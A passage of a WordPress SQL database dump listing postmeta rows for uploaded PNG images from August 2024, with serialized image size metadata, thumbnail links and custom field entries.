6;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:914752;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"14-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1672814;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"14-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115207;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1327,411,'_thumbnail_id','412'),
(1328,411,'_edit_last','1'),
(1329,411,'title_style','default'),
(1330,411,'_title_style','field_5d1a0217cf408'),
(1331,411,'related',''),
(1332,411,'_related','field_603b51c3e183e'),
(1333,413,'title_style','default'),
(1334,413,'_title_style','field_5d1a0217cf408'),
(1335,413,'related',''),
(1336,413,'_related','field_603b51c3e183e'),
(1337,414,'_edit_lock','1722519819:1'),
(1338,415,'_wp_attached_file','2024/08/15-67.png'),
(1339,415,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/15-67.png\";s:8:\"filesize\";i:2583239;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"15-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:102430;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"15-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:777721;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"15-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42531;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"15-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:864246;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"15-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1555049;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"15-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:108050;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1341,414,'_thumbnail_id','415'),
(1342,414,'_edit_last','1'),
(1344,414,'title_style','default'),
(1345,414,'_title_style','field_5d1a0217cf408'),
(1346,414,'related',''),
(1347,414,'_related','field_603b51c3e183e'),
(1348,416,'title_style','default'),
(1349,416,'_title_style','field_5d1a0217cf408'),
(1350,416,'related',''),
(1351,416,'_related','field_603b51c3e183e'),
(1352,417,'_edit_lock','1722519896:1'),
(1353,418,'_wp_attached_file','2024/08/16-67.png'),
(1354,418,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/16-67.png\";s:8:\"filesize\";i:2805785;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"16-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:101480;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"16-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:801619;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"16-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43560;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"16-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:892797;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"16-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1633303;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"16-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:109245;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1356,417,'_thumbnail_id','418'),
(1357,417,'_edit_last','1'),
(1359,417,'title_style','default'),
(1360,417,'_title_style','field_5d1a0217cf408'),
(1361,417,'related',''),
(1362,417,'_related','field_603b51c3e183e'),
(1363,419,'title_style','default'),
(1364,419,'_title_style','field_5d1a0217cf408'),
(1365,419,'related',''),
(1366,419,'_related','field_603b51c3e183e'),
(1367,420,'_edit_lock','1722519963:1'),
(1368,421,'_wp_attached_file','2024/08/17-67.png'),
(1369,421,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/17-67.png\";s:8:\"filesize\";i:2741005;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"17-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:101563;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"17-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:814600;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"17-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43671;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"17-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:915724;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"17-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1745004;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"17-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:118106;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1371,420,'_thumbnail_id','421'),
(1372,420,'_edit_last','1'),
(1373,420,'title_style','default'),
(1374,420,'_title_style','field_5d1a0217cf408'),
(1375,420,'related',''),
(1376,420,'_related','field_603b51c3e183e'),
(1377,422,'title_style','default'),
(1378,422,'_title_style','field_5d1a0217cf408'),
(1379,422,'related',''),
(1380,422,'_related','field_603b51c3e183e'),
(1381,423,'_edit_lock','1722520032:1'),
(1382,424,'_wp_attached_file','2024/08/18-67.png'),
(1383,424,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/18-67.png\";s:8:\"filesize\";i:2795916;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"18-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:106316;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"18-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:849499;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"18-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45413;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"18-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:945974;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"18-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1724193;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"18-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115091;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1385,423,'_thumbnail_id','424'),
(1386,423,'_edit_last','1'),
(1388,423,'title_style','default'),
(1389,423,'_title_style','field_5d1a0217cf408'),
(1390,423,'related',''),
(1391,423,'_related','field_603b51c3e183e'),
(1392,425,'title_style','default'),
(1393,425,'_title_style','field_5d1a0217cf408'),
(1394,425,'related',''),
(1395,425,'_related','field_603b51c3e183e'),
(1396,426,'_edit_lock','1722520102:1'),
(1397,427,'_wp_attached_file','2024/08/19-2567.png'),
(1398,427,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:19:\"2024/08/19-2567.png\";s:8:\"filesize\";i:2936261;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"19-2567-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115047;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"19-2567-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:971497;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"19-2567-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45779;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"19-2567-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1079267;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"19-2567-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1942598;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"19-2567-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:110023;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1400,426,'_thumbnail_id','427'),
(1401,426,'_edit_last','1'),
(1402,426,'title_style','default'),
(1403,426,'_title_style','field_5d1a0217cf408'),
(1404,426,'related',''),
(1405,426,'_related','field_603b51c3e183e'),
(1406,428,'title_style','default'),
(1407,428,'_title_style','field_5d1a0217cf408'),
(1408,428,'related',''),
(1409,428,'_related','field_603b51c3e183e'),
(1410,429,'_edit_lock','1722520212:1'),
(1411,430,'_wp_attached_file','2024/08/20-2567.png'),
(1412,430,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:19:\"2024/08/20-2567.png\";s:8:\"filesize\";i:3140326;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"20-2567-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119357;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"20-2567-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1013166;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"20-2567-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47554;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"20-2567-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1120024;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"20-2567-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2014533;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"20-2567-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:111724;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1414,429,'_thumbnail_id','430'),
(1415,429,'_edit_last','1'),
(1416,429,'title_style','default'),
(1417,429,'_title_style','field_5d1a0217cf408'),
(1418,429,'related',''),
(1419,429,'_related','field_603b51c3e183e'),
(1420,431,'title_style','default'),
(1421,431,'_title_style','field_5d1a0217cf408'),
(1422,431,'related',''),
(1423,431,'_related','field_603b51c3e183e'),
(1424,432,'_edit_lock','1722520280:1'),
(1425,433,'_wp_attached_file','2024/08/21-67.png'),
(1426,433,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/21-67.png\";s:8:\"filesize\";i:4603258;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"21-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:138011;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"21-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1208463;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"21-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:52776;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"21-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1334220;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"21-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2383465;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"21-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:131519;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1428,432,'_thumbnail_id','433'),
(1429,432,'_edit_last','1'),
(1430,432,'title_style','default'),
(1431,432,'_title_style','field_5d1a0217cf408'),
(1432,432,'related',''),
(1433,432,'_related','field_603b51c3e183e'),
(1434,434,'title_style','default'),
(1435,434,'_title_style','field_5d1a0217cf408'),
(1436,434,'related',''),
(1437,434,'_related','field_603b51c3e183e'),
(1438,435,'_edit_lock','1722520356:1'),
(1439,436,'_wp_attached_file','2024/08/22-67.png'),
(1440,436,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/22-67.png\";s:8:\"filesize\";i:3909061;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"22-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:126046;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"22-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1120525;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"22-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:50297;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"22-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1242308;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"22-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2271950;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"22-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:155990;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1442,435,'_thumbnail_id','436'),
(1443,435,'_edit_last','1'),
(1444,435,'title_style','default'),
(1445,435,'_title_style','field_5d1a0217cf408'),
(1446,435,'related',''),
(1447,435,'_related','field_603b51c3e183e'),
(1448,437,'title_style','default'),
(1449,437,'_title_style','field_5d1a0217cf408'),
(1450,437,'related',''),
(1451,437,'_related','field_603b51c3e183e'),
(1452,438,'_edit_lock','1722520437:1'),
(1453,439,'_wp_attached_file','2024/08/23-67.png'),
(1454,439,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/23-67.png\";s:8:\"filesize\";i:2914208;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"23-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:102850;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"23-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:851596;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"23-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43368;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"23-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:952687;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"23-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1798297;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"23-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:106193;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1456,438,'_thumbnail_id','439'),
(1457,438,'_edit_last','1'),
(1459,438,'title_style','default'),
(1460,438,'_title_style','field_5d1a0217cf408'),
(1461,438,'related',''),
(1462,438,'_related','field_603b51c3e183e'),
(1463,440,'title_style','default'),
(1464,440,'_title_style','field_5d1a0217cf408'),
(1465,440,'related',''),
(1466,440,'_related','field_603b51c3e183e'),
(1467,441,'_edit_lock','1722520504:1'),
(1468,442,'_wp_attached_file','2024/08/24-67.png'),
(1469,442,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/24-67.png\";s:8:\"filesize\";i:4300405;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"24-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132370;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"24-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1159868;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"24-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47700;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"24-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1282946;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"24-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2321972;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"24-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:106866;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1471,441,'_thumbnail_id','442'),
(1472,441,'_edit_last','1'),
(1474,441,'title_style','default'),
(1475,441,'_title_style','field_5d1a0217cf408'),
(1476,441,'related',''),
(1477,441,'_related','field_603b51c3e183e'),
(1478,443,'title_style','default'),
(1479,443,'_title_style','field_5d1a0217cf408'),
(1480,443,'related',''),
(1481,443,'_related','field_603b51c3e183e'),
(1482,444,'_edit_lock','1722520566:1'),
(1483,445,'_wp_attached_file','2024/08/25-67.png'),
(1484,445,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/25-67.png\";s:8:\"filesize\";i:3135813;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"25-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:109323;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"25-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:912521;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"25-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45608;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"25-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1015934;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"25-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1873511;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"25-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:122027;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1486,444,'_thumbnail_id','445'),
(1487,444,'_edit_last','1'),
(1488,444,'title_style','default'),
(1489,444,'_title_style','field_5d1a0217cf408'),
(1490,444,'related',''),
(1491,444,'_related','field_603b51c3e183e'),
(1492,446,'title_style','default'),
(1493,446,'_title_style','field_5d1a0217cf408'),
(1494,446,'related',''),
(1495,446,'_related','field_603b51c3e183e'),
(1496,447,'_edit_lock','1722520638:1'),
(1497,448,'_wp_attached_file','2024/08/26-67.png'),
